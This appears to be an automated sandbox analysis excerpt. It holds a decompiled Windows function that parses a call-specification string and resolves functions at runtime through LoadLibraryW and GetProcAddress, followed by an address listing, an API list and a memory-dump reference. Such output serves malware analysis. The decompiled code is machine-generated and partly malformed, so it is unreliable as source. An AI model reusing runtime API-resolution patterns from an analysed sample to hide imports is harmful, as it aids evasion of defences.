				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E6E49121B();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E6E49121B();
				_t321 = E6E491243();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E6E491311(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E6E49158F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x6e492348) & 0x000000ff) * 4 +  &M6E4922BC))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E6E49122C(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E6E49121B();
											 &_v12 = E6E491AE6( &_v12);
											__eax = E6E491470(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E6E491AE6( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E6E491AE6( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x6e49405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E6E491AE6( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E6E49161D( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E6E491311(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E6E49161D( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E6E491311(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E6E491311(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E6E491311(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E6E49122C(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E6E491311(_t90) * 4);
					goto L165;
				}
			}

0x6e491b67
0x6e491b6a
0x6e491b6d
0x6e491b70
0x6e491b73
0x6e491b76
0x6e491b79
0x6e491b7b
0x6e491b7e
0x6e491b81
0x6e491b86
0x6e491b89
0x6e491b91
0x6e491b99
0x6e491b9b
0x6e491b9e
0x6e491ba6
0x6e491ba6
0x6e491bab
0x6e491bae
0x00000000
0x00000000
0x6e491bbb
0x6e491bc0
0x6e491bc2
0x6e491c54
0x6e491c54
0x6e491c54
0x6e491c58
0x6e491c5b
0x6e491c5d
0x6e491c7f
0x6e491c81
0x6e491c84
0x6e491c8d
0x6e491c93
0x6e491c95
0x6e491c9b
0x6e491c9b
0x6e491ca1
0x6e491ca4
0x6e491ca4
0x6e491ca7
0x6e491ca7
0x6e491cad
0x6e491caf
0x6e491caf
0x6e491cb1
0x6e491cb4
0x6e491cb7
0x6e491cbd
0x6e491cc3
0x6e491cc6
0x6e491cea
0x6e491ced
0x00000000
0x00000000
0x6e491cf0
0x6e491cf2
0x6e491d00
0x6e491d03
0x6e491d05
0x00000000
0x00000000
0x00000000
0x00000000
0x6e491d07
0x6e491d07
0x6e491d07
0x6e491d0d
0x6e491d0f
0x00000000
0x00000000
0x6e491d11
0x6e491d13
0x6e491d15
0x6e491d17
0x00000000
0x00000000
0x00000000
0x6e491d17
0x6e491d19
0x6e491d1b
0x6e491d1d
0x6e491d1d
0x6e491d23
0x6e491d29
0x6e491d2b
0x6e491d3f
0x6e491d3f
0x6e491d41
0x6e491d2d
0x6e491d33
0x6e491d36
0x6e491d36
0x00000000
0x6e491cc8
0x6e491cc8
0x6e491cc8
0x6e491cc9
0x6e491cd1
0x6e491cd5
0x6e491cdb
0x6e491cdf
0x00000000
0x6e491cdf
0x6e491ccb
0x6e491ccb
0x6e491ccc
0x00000000
0x00000000
0x6e491cce
0x6e491ccf
0x00000000
0x00000000
0x00000000
0x6e491ccf
0x6e491c5f
0x6e491c60
0x6e491c69
0x6e491c6c
0x6e491c79
0x6e491c79
0x6e491c6e
0x6e491c6e
0x6e491d47
0x6e491d4a
0x6e491d4e
0x6e491dc1
0x6e491dc5
0x6e491ba3
0x00000000
0x6e491ba3
0x00000000
0x6e491dc5
0x6e491c5d
0x6e491bc8
0x6e491bcb
0x6e491c2e
0x6e491c31
0x6e491c43
0x6e491c43
0x6e491c46
0x6e491d53
0x6e491d56
0x6e491d56
0x6e491d58
0x6e49210e
0x6e492126
0x6e492126
0x6e492129
0x00000000
0x00000000
0x6e492113
0x6e492114
0x6e492117
0x6e49211a
0x6e4921a4
0x6e4921ab
0x6e4921b1
0x6e4921b5
0x6e491dbc
0x6e491dbd
0x6e491dbd
0x6e491dbe
0x00000000
0x6e491dbe
0x6e492120
0x6e492123
0x6e492123
0x6e49212b
0x6e49212e
0x6e492198
0x6e491db1
0x6e491db4
0x6e491db7
0x6e491dba
0x6e491dba
0x00000000
0x6e491dba
0x6e492130
0x6e492133
0x6e49213a
0x6e49213a
0x6e49213d
0x6e492141
0x6e492155
0x6e492155
0x6e492158
0x6e49215c
0x00000000
0x00000000
0x6e49215e
0x6e492162
0x00000000
0x00000000
0x6e492164
0x6e49216b
0x6e49216b
0x6e492171
0x6e492174
0x6e492190
0x6e492176
0x6e49217f
0x6e492182
0x6e492182
0x00000000
0x6e492174
0x6e492143
0x6e492146
0x6e49214a
0x00000000
0x00000000
0x6e49214c
0x00000000
0x6e49214c
0x6e492135
0x6e492138
0x00000000
0x00000000
0x00000000
0x6e492138
0x6e491d5e
0x6e491d5e
0x6e491d5f
0x6e491ea9
0x6e491ea9
0x6e491eb0
0x6e491eb3
0x00000000
0x00000000
0x6e491ec0
0x00000000
0x6e4920ab
0x6e4920ae
0x6e4920b1
0x6e4920b1
0x6e4920b2
0x6e4920b3
0x6e4920b6
0x6e4920b9
0x6e4920bc
0x00000000
0x00000000
0x6e4920be
0x6e4920be
0x6e4920c2
0x6e4920da
0x6e4920dd
0x6e4920e1
0x6e4920e7
0x00000000
0x6e4920e7
0x6e4920c4
0x6e4920c4
0x6e4920c7
0x00000000
0x00000000
0x6e4920c9
0x6e4920cc
0x6e4920ce
0x6e4920cf
0x6e4920cf
0x6e4920cf
0x6e4920d0
0x6e4920d3
0x6e4920d6
0x6e4920d7
0x6e4920b1
0x6e4920b2
0x6e4920b3
0x6e4920b6
0x6e4920b9
0x6e4920bc
0x00000000
0x00000000
0x00000000
0x6e4920bc
0x00000000
0x6e491f07
0x00000000
0x00000000
0x6e491f13
0x00000000
0x00000000
0x6e491efa
0x6e491efe
0x6e491f02
0x00000000
0x00000000
0x6e49207c
0x6e492080
0x00000000
0x00000000
0x6e492086
0x6e49208f
0x6e492096
0x6e49209e
0x00000000
0x00000000
0x6e491fe3
0x6e491fe3
0x00000000
0x00000000
0x6e491f1c
0x00000000
0x00000000
0x6e492106
0x00000000
0x00000000
0x6e491feb
0x6e491fed
0x6e491fed
0x00000000
0x00000000
0x6e4920f6
0x00000000
0x00000000
0x6e4920fa
0x00000000
0x00000000
0x6e492102
0x00000000
0x00000000
0x6e492033
0x6e492035
0x6e492035
0x00000000
0x00000000
0x6e491ffd
0x6e491fff
0x6e491fff
0x00000000
0x00000000
0x6e49200f
0x6e492011
0x6e492011
0x00000000
0x00000000
0x6e492041
0x6e492043
0x6e492043
0x00000000
0x00000000
0x6e49201a
0x6e49201c
0x6e49201c
0x00000000
0x00000000
0x6e492021
0x00000000
0x00000000
0x6e4920fe
0x6e492108
0x6e492108
0x00000000
0x00000000
0x6e49204c
0x6e492050
0x6e492055
0x6e492058
0x6e492059
0x6e49205c
0x6e492062
0x6e492062
0x00000000
0x00000000
0x6e4920ee
0x00000000
0x00000000
0x6e492025
0x6e492027
0x6e492027
0x00000000
0x00000000
0x6e491f23
0x6e491f23
0x00000000
0x00000000
0x6e49203a
0x6e49203c
0x6e49203c
0x00000000
0x00000000
0x6e491ec7
0x6e491ecd
0x6e491ed0
0x6e491ed2
0x6e491ed2
0x6e491ed5
0x6e491ed9
0x6e491ee6
0x6e491ee8
0x6e491eee
0x6e491eee
0x6e491eee
0x00000000
0x00000000
0x6e491fee
0x6e491fee
0x6e491ff0
0x6e491ff7
0x00000000
0x00000000
0x6e492036
0x6e492036
0x00000000
0x00000000
0x6e492000
0x6e492000
0x6e492002
0x6e492009
0x00000000
0x00000000
0x6e492012
0x6e492012
0x6e492014
0x00000000
0x00000000
0x6e492044
0x6e492044
0x00000000
0x00000000
0x6e49201d
0x6e49201d
0x00000000
0x00000000
0x6e49206a
0x6e49206e
0x6e492073
0x6e492076
0x00000000
0x00000000
0x6e492028
0x6e492028
0x6e49202b
0x6e49202d
0x00000000
0x00000000
0x6e49203d
0x6e49203d
0x6e492046
0x6e492046
0x6e491f25
0x6e491f25
0x6e491f28
0x6e491f2f
0x6e491f31
0x6e491f33
0x6e491f3a
0x6e491f3d
0x6e491f42
0x6e491f44
0x6e491f46
0x6e491f4a
0x6e491f50
0x6e491f56
0x6e491f56
0x6e491f58
0x6e491f58
0x6e491f59
0x6e491f59
0x6e491f5d
0x6e491f63
0x6e491f65
0x6e491f69
0x6e491f6e
0x6e491f6e
0x6e491f70
0x6e491f70
0x6e491f73
0x6e491f76
0x6e491f7f
0x6e491f85
0x6e491f88
0x6e491f88
0x6e491f8a
0x6e491f8d
0x6e491f93
0x6e491f99
0x6e491f99
0x6e491f9b
0x00000000
0x00000000
0x6e491fa1
0x6e491fa1
0x6e491fa5
0x6e491fac
0x6e491fd0
0x6e491fd0
0x6e491fd4
0x6e491fd6
0x6e491fd9
0x6e491fd9
0x6e491fdc
0x6e491fdc
0x00000000
0x6e491fd4
0x6e491fb1
0x6e491fb4
0x6e491fb4
0x6e491fbb
0x6e491fbd
0x6e491fc0
0x6e491fc7
0x6e491fc8
0x6e491fce
0x6e491fce
0x00000000
0x6e491fce
0x6e491fc2
0x6e491fc5
0x00000000
0x00000000
0x00000000
0x6e491fc5
0x6e491f52
0x6e491f54
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e491ec0
0x6e491d65
0x6e491d65
0x6e491d66
0x6e491ea6
0x00000000
0x6e491ea6
0x6e491d6c
0x6e491d6d
0x00000000
0x00000000
0x6e491d73
0x6e491d76
0x6e491e6b
0x6e491e6b
0x6e491e6e
0x6e491e83
0x6e491e85
0x6e491e85
0x6e491e86
0x6e491e89
0x6e491e8c
0x6e491e98
0x6e491e98
0x6e491e98
0x6e491e8e
0x6e491e8e
0x6e491e8e
0x6e491e9e
0x00000000
0x6e491e9e
0x6e491e70
0x6e491e70
0x6e491e71
0x6e491e7f
0x00000000
0x6e491e7f
0x6e491e74
0x6e491e75
0x00000000
0x00000000
0x6e491e7b
0x00000000
0x6e491e7b
0x6e491d7c
0x6e491e67
0x00000000
0x6e491e67
0x6e491d82
0x6e491d82
0x6e491d85
0x6e491dae
0x00000000
0x6e491dae
0x6e491d87
0x6e491d87
0x6e491d8a
0x6e491da4
0x00000000
0x6e491da4
0x6e491d8c
0x6e491d8c
0x6e491d8f
0x6e491d9e
0x00000000
0x6e491d9e
0x6e491d92
0x6e491d93
0x00000000
0x00000000
0x6e491d95
0x00000000
0x6e491c4c
0x6e491c4c
0x6e491c4f
0x00000000
0x6e491c4f
0x6e491c46
0x6e491c33
0x6e491c38
0x00000000
0x00000000
0x6e491c3a
0x6e491c3d
0x00000000
0x00000000
0x00000000
0x6e491c3d
0x6e491bcd
0x6e491bd0
0x6e491c06
0x6e491c09
0x00000000
0x6e491c0f
0x6e491c11
0x6e491c15
0x6e491c1c
0x6e491c23
0x6e491c26
0x6e491c29
0x00000000
0x6e491c29
0x6e491c09
0x6e491bd2
0x6e491bd3
0x6e491bee
0x6e491bf1
0x00000000
0x6e491bf7
0x6e491bf7
0x6e491bfe
0x6e491c01
0x00000000
0x6e491c01
0x6e491bf1
0x6e491bd8
0x00000000
0x6e491bde
0x6e491bde
0x6e491be5
0x00000000
0x6e491be5
0x6e491bd8
0x6e491dd4
0x6e491dd9
0x6e491dde
0x6e491de2
0x6e4922b5
0x6e4922bb
0x6e491df4
0x6e491df6
0x6e491df7
0x6e4921de
0x6e4921de
0x6e4921e1
0x6e4921e4
0x6e492201
0x6e492207
0x6e492209
0x6e49220f
0x6e492226
0x6e492226
0x6e492226
0x6e492233
0x6e492239
0x6e49223c
0x6e492242
0x6e492244
0x6e492248
0x6e49224a
0x6e492251
0x6e492256
0x6e492259
0x6e49225b
0x6e492260
0x6e492272
0x6e492272
0x6e492260
0x6e492259
0x6e492248
0x6e492278
0x6e49227b
0x6e492285
0x6e49228d
0x6e49229a
0x6e4922a0
0x6e4922a3
0x6e4921d3
0x6e4921d3
0x00000000
0x6e4921d3
0x6e4922a9
0x6e4922af
0x6e4922af
0x00000000
0x00000000
0x6e4922b1
0x6e4922b1
0x6e4922b1
0x6e4922b1
0x00000000
0x6e49227d
0x6e49227d
0x6e492283
0x00000000
0x00000000
0x00000000
0x6e492283
0x6e49227b
0x6e492212
0x6e492218
0x6e49221a
0x6e492220
0x00000000
0x00000000
0x00000000
0x6e492220
0x6e4921e6
0x6e4921ed
0x6e4921f3
0x6e4921f9
0x00000000
0x6e4921f9
0x6e491dfd
0x6e491dfe
0x6e4921bd
0x6e4921bd
0x6e4921c3
0x6e4921c6
0x00000000
0x00000000
0x6e4921cd
0x6e4921d2
0x00000000
0x6e4921d2
0x6e491e05
0x00000000
0x00000000
0x6e491e0b
0x6e491e0b
0x6e491e14
0x6e491e19
0x6e491e1f
0x00000000
0x00000000
0x6e491e25
0x6e491e32
0x6e491e38
0x6e491e42
0x6e491e48
0x6e491e50
0x6e491e60
0x00000000
0x6e491e60

APIs

Part of subcall function 6E49121B: GlobalAlloc.KERNEL32(00000040,?,6E49123B,?,6E4912DF,00000019,6E4911BE,-000000A0), ref: 6E491225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6E491C8D
lstrcpyW.KERNEL32(00000008,?), ref: 6E491CD5
lstrcpyW.KERNEL32(00000808,?), ref: 6E491CDF
GlobalFree.KERNEL32(00000000), ref: 6E491CF2
GlobalFree.KERNEL32(?), ref: 6E491DD4
GlobalFree.KERNEL32(?), ref: 6E491DD9
GlobalFree.KERNEL32(?), ref: 6E491DDE
GlobalFree.KERNEL32(00000000), ref: 6E491FC8
lstrcpyW.KERNEL32(?,?), ref: 6E492182
GetModuleHandleW.KERNEL32(00000008), ref: 6E492201
LoadLibraryW.KERNEL32(00000008), ref: 6E492212
GetProcAddress.KERNEL32(?,?), ref: 6E49226C
lstrlenW.KERNEL32(00000808), ref: 6E492286

Memory Dump Source

Source File: 00000001.00000002.9314657277.000000006E491000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E490000, based on PE: true

